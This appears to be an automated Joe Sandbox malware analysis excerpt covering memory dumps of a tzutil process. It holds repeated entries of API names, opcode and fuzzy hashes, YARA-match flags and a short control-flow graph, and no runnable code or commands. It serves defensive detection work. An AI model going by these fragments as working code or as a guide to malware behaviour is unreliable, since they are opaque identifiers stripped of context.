                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                              • Instruction ID: bd3717961f9366dcefdaf64b9d10a5f8572503f54016fde1d45c49df651c3628
                                                              • Opcode Fuzzy Hash: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                              • Instruction Fuzzy Hash: 962106B5A00249ABDB10DF98DC81EEFB7B9EF89704F10810DF948AB240D774A9518FA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteFile
                                                              • String ID:
                                                              • API String ID: 4033686569-0
                                                              • Opcode ID: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                              • Instruction ID: 14fb064f76088e21e450f1886777016d7a5eb30ce3f5e480d949382f72772644
                                                              • Opcode Fuzzy Hash: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                              • Instruction Fuzzy Hash: 431170716013087ADA60EA94DC41FEBB3ADDF89704F10414DF94C6B240DB7579458BA9
                                                              APIs
                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 026B97B1
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                              • Instruction ID: 13f8079e5a0e2c2765c25da13d08a618ffa86f7bf4b21cb21f7b159f29db88f7
                                                              • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                              • Instruction Fuzzy Hash: E9E08C36211604BBE620FA99DC00F9BB76DEFCAB50F008019FA48A7240C671B9148BF4
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 35288223995c9f4aac4194e9062b5cc20542a36af81de596e6f2dfa7cb15e2da
                                                              • Instruction ID: 49b074a46f0cef3ffa3784b65187bf6ae7af278a6415af7d50736165b4691400
                                                              • Opcode Fuzzy Hash: 35288223995c9f4aac4194e9062b5cc20542a36af81de596e6f2dfa7cb15e2da
                                                              • Instruction Fuzzy Hash: 45900231645800129980B1584885547400597E1301B55D012E0428555C8A548A569365
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bb47bf280a017728abff5ba0c2ea36df6a1f14cb9bcea5db3ed13143ce74f7b3
                                                              • Instruction ID: 51e644f1048b4d73e90fb18964b1777794131eb8517c442abeae45a3e6b45bf0
                                                              • Opcode Fuzzy Hash: bb47bf280a017728abff5ba0c2ea36df6a1f14cb9bcea5db3ed13143ce74f7b3
                                                              • Instruction Fuzzy Hash: D9900271641500424980B1584805407600597E2301395D116A0558561C86588955D26D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f88477efde315a3034ebb3e9c4409977847fb8f646d5d860c3208b57a69fce21
                                                              • Instruction ID: 0b30587b0fb45f86cc12d9183bc773dda4866b218faa327951f2d284e99cc2ac
                                                              • Opcode Fuzzy Hash: f88477efde315a3034ebb3e9c4409977847fb8f646d5d860c3208b57a69fce21
                                                              • Instruction Fuzzy Hash: 27900235261400020985F558060550B044597D7351395D016F141A591CC66189659325
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e7dac116a7bab81c0c33488b80fed3f08fff4f2653f87af9f5b43e4ff331aae9
                                                              • Instruction ID: 4339bda32fa7af3197c1e0858ed5c5d1e15be399d89a54104dc8a8e1c603e85c
                                                              • Opcode Fuzzy Hash: e7dac116a7bab81c0c33488b80fed3f08fff4f2653f87af9f5b43e4ff331aae9
                                                              • Instruction Fuzzy Hash: 8E900435351400030D45F55C07055070047C7D7351355D033F101D551CD771CD71D135
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3e35913a0afad0219dd780f3c0348f2da4e9788ef3f9c576ab2e1b0ef1a0e413
                                                              • Instruction ID: cff4d7ba83cbb9db7fbd9f1d180a8f9c28ab1eb4229d323527d29db3725319a7
                                                              • Opcode Fuzzy Hash: 3e35913a0afad0219dd780f3c0348f2da4e9788ef3f9c576ab2e1b0ef1a0e413
                                                              • Instruction Fuzzy Hash: 6E90023124544842D980B1584405A47001587D1305F55D012A0068695D96658E55F665
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 256f0781a692dbd215a54969ff39dc3bc3f7580bd9dd7bda1e02c4e7bbcbf4ef
                                                              • Instruction ID: f5e30d16065ae383384df37835be0514c812590da6d5cd718dc2094115250da9
                                                              • Opcode Fuzzy Hash: 256f0781a692dbd215a54969ff39dc3bc3f7580bd9dd7bda1e02c4e7bbcbf4ef
                                                              • Instruction Fuzzy Hash: 0F90023124140802D9C0B158440564B000587D2301F95D016A0029655DCA558B59B7A5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a0e82d737df5fce1df5631d27a66926b0a966704644b55f60fbb26ac37ba863e
                                                              • Instruction ID: 1498f1a27f871ca14f72338e7b23b3396ca534bbecdd87bca1c06558ad714868
                                                              • Opcode Fuzzy Hash: a0e82d737df5fce1df5631d27a66926b0a966704644b55f60fbb26ac37ba863e
                                                              • Instruction Fuzzy Hash: 4290023164540802D990B1584415747000587D1301F55D012A0028655D87958B55B6A5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 55f19695320d67834e8e4fc75708bcdce8d7b88816a3f538062a6a7db306ac4d
                                                              • Instruction ID: d8d74660482c5988f6fbb748cb37eb7f8471cd596b371a0be13002dce00aa6c6
                                                              • Opcode Fuzzy Hash: 55f19695320d67834e8e4fc75708bcdce8d7b88816a3f538062a6a7db306ac4d
                                                              • Instruction Fuzzy Hash: A1900271242400034945B1584415617400A87E1201B55D022E1018591DC5658991A129
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: ab14a1084ca6876392f203ad24b80e2fd506e48ed0749c8eba8ca079e1d4f872
                                                              • Instruction ID: 3dcaa5f8c214b2b7f33be3d3e2f2e578184e1c29602bac6132ac361525ffd8d0
                                                              • Opcode Fuzzy Hash: ab14a1084ca6876392f203ad24b80e2fd506e48ed0749c8eba8ca079e1d4f872
                                                              • Instruction Fuzzy Hash: D690027124180403D980B5584805607000587D1302F55D012A2068556E8A698D51A139
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c6c80b1c654d9a91dc59eaac1fbd44639110391c2713464ff11e11571845373f
                                                              • Instruction ID: 486bb9b66625a82dad9941a93909d719f29c9d311f9a7cf9c603b7295b5e99b0
                                                              • Opcode Fuzzy Hash: c6c80b1c654d9a91dc59eaac1fbd44639110391c2713464ff11e11571845373f
                                                              • Instruction Fuzzy Hash: 4F90023164140502D941B1584405617000A87D1241F95D023A1028556ECA658A92E135
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6812511ecc649087bde94c69598fb74902eea2cc53ab2376f5b43712fb3ed2e9
                                                              • Instruction ID: a51a3544c8c487e61a4175438d6637be13ef601d585f83b6f161344968a741ec
                                                              • Opcode Fuzzy Hash: 6812511ecc649087bde94c69598fb74902eea2cc53ab2376f5b43712fb3ed2e9
                                                              • Instruction Fuzzy Hash: EB900231251C0042DA40B5684C15B07000587D1303F55D116A0158555CC95589619525
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: af65843bf7d5811f55b36831459121cbae92a4c95626615b2629a0d83f0a702f
                                                              • Instruction ID: 8b04b1accfc4f87bcfc5d3606867edc4ca47fb600cf360c4bfccae57cea1ae7f
                                                              • Opcode Fuzzy Hash: af65843bf7d5811f55b36831459121cbae92a4c95626615b2629a0d83f0a702f
                                                              • Instruction Fuzzy Hash: D8900231641400424980B16888459074005ABE2211755D122A099C551D859989659669
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5cc1147f93e9115da9c9f6e8589f1818a1b6b833b2794fba058984105fc42bd3
                                                              • Instruction ID: cf5052b89afac04b73b11aa7fade901194ac6f283a3e7fcd45980f2aa176f1a7
                                                              • Opcode Fuzzy Hash: 5cc1147f93e9115da9c9f6e8589f1818a1b6b833b2794fba058984105fc42bd3
                                                              • Instruction Fuzzy Hash: D790027138140442D940B1584415B070005C7E2301F55D016E1068555D8659CD52A12A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 07b6c82f21c750f66247f0a97a87ec4ebe463bc18942233753308b80f1236414
                                                              • Instruction ID: 430f5e1288d62e5b59e84d5a60fb777937b87f01ae0d1ef75c73561651296f91
                                                              • Opcode Fuzzy Hash: 07b6c82f21c750f66247f0a97a87ec4ebe463bc18942233753308b80f1236414
                                                              • Instruction Fuzzy Hash: B790023124140402D940B5985409647000587E1301F55E012A5028556EC6A58991A135
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 06197b131bdee78d71ca85cc9b7b9ef0806b25d1a45c72a27ff9d12bda364dbb
                                                              • Instruction ID: 0f7068bf23a3d1a97337968a3837a46a8dcec5bf2be7a27b82e6681010d7bddf
                                                              • Opcode Fuzzy Hash: 06197b131bdee78d71ca85cc9b7b9ef0806b25d1a45c72a27ff9d12bda364dbb
                                                              • Instruction Fuzzy Hash: A290023124140842D940B1584405B47000587E1301F55D017A0128655D8655C951B525
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3504cd1c2178b4ab6c55ae0e8236efe721807f1cb995eecd38583b9af5217f35
                                                              • Instruction ID: 176039c86e412ad76d57a9339c822e7f5a9a76e8ce9f3cf4397678d9b77df9ea
                                                              • Opcode Fuzzy Hash: 3504cd1c2178b4ab6c55ae0e8236efe721807f1cb995eecd38583b9af5217f35
                                                              • Instruction Fuzzy Hash: 7690023124148802D950B158840574B000587D1301F59D412A4428659D86D58991B125
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c61c6f773ad36da4b8cff5d2c2038550ce6bab7d35b40560c5e955f3ab909115
                                                              • Instruction ID: 29d040dba23322bb0038a31641dcd94e1a642b4f59c2ed5bc15a57ec1ed7f2f6
                                                              • Opcode Fuzzy Hash: c61c6f773ad36da4b8cff5d2c2038550ce6bab7d35b40560c5e955f3ab909115
                                                              • Instruction Fuzzy Hash: 9B90023124140413D951B1584505707000987D1241F95D413A0428559D96968A52E125
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8aa5de9d17ef25f509145519e1dcdbd9973d4b7ef4b07cae1cab4d3e1ec1c7a5
                                                              • Instruction ID: a8b17d102d6663ca5d2b028e4ea75b288ccf8fd673589e80d10a7ec1d6361afa
                                                              • Opcode Fuzzy Hash: 8aa5de9d17ef25f509145519e1dcdbd9973d4b7ef4b07cae1cab4d3e1ec1c7a5
                                                              • Instruction Fuzzy Hash: 50900231282441525D85F1584405507400697E1241795D013A1418951C85669956D625
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 0130b0f3ecf243dd232f49498001b7f69ff82e0b539229454891e6b79950a7cd
                                                              • Instruction ID: 60ab7b198842f4d3e638a9a8a6758db28abb81d44690c0796fdc2da61d6af66b
                                                              • Opcode Fuzzy Hash: 0130b0f3ecf243dd232f49498001b7f69ff82e0b539229454891e6b79950a7cd
                                                              • Instruction Fuzzy Hash: 7D90023134140003D980B15854196074005D7E2301F55E012E0418555CD95589569226
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4f4876022f271fb80650957086a512b35977d215eb44f2e9377106517ed04302
                                                              • Instruction ID: 7d0ab85acaaca63ac03c140c800e082c16324146d6d03a3747df0a66230b549e
                                                              • Opcode Fuzzy Hash: 4f4876022f271fb80650957086a512b35977d215eb44f2e9377106517ed04302
                                                              • Instruction Fuzzy Hash: ED90023925340002D9C0B158540960B000587D2202F95E416A0019559CC95589699325
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c325afb17a0d1fda6417cb4a6148d5055012be3967fc18454be52ff7a5bbff01
                                                              • Instruction ID: 832f40db4b9bcd9d09a63d613430b2463b2eed6db1fd25cf59473ebfdc4836d7
                                                              • Opcode Fuzzy Hash: c325afb17a0d1fda6417cb4a6148d5055012be3967fc18454be52ff7a5bbff01
                                                              • Instruction Fuzzy Hash: 0390023164550402D940B1584515707100587D1201F65D412A0428569D87D58A51A5A6
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1d9b81c5dcdfa9bdcfd78861390f587a40cfa9519ffef4b34fe5980417642062
                                                              • Instruction ID: 56ab82fd8cf6bf3cd7d67352ff4a94ae13addca2837a78a66ecf24602c7a3bda
                                                              • Opcode Fuzzy Hash: 1d9b81c5dcdfa9bdcfd78861390f587a40cfa9519ffef4b34fe5980417642062
                                                              • Instruction Fuzzy Hash: 9590023128545102D990B15C44056174005A7E1201F55D022A0818595D85958955A225

                                                              Control-flow Graph

                                                              control_flow_graph 429 26a114d-26a1158 430 26a115a-26a1166 429->430 431 26a11d8-26a1247 call 26bb890 call 26bc2a0 call 26a4990 call 26913e0 call 26b2000 429->431 432 26a1168 430->432 433 26a11c3-26a11d4 430->433 445 26a1249-26a1258 PostThreadMessageW 431->445 446 26a1267-26a126d 431->446 432->433 445->446 447 26a125a-26a1264 445->447 447->446
                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 026A1254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: d1aa6d2f37b84fe075a66538aa12b124caae1e2cf1a1ebade3796bc28cf5f9fe
                                                              • Instruction ID: 86513f89b5199632d2364484b2ec00c2ec1033a7fb3caaf7de1a37068c079198
                                                              • Opcode Fuzzy Hash: d1aa6d2f37b84fe075a66538aa12b124caae1e2cf1a1ebade3796bc28cf5f9fe
                                                              • Instruction Fuzzy Hash: DC212672A0424C7EEF01AE949C82DEFBB7CEF41394F0041ADF948A7240D6249E068FE5

                                                              Control-flow Graph

                                                              APIs
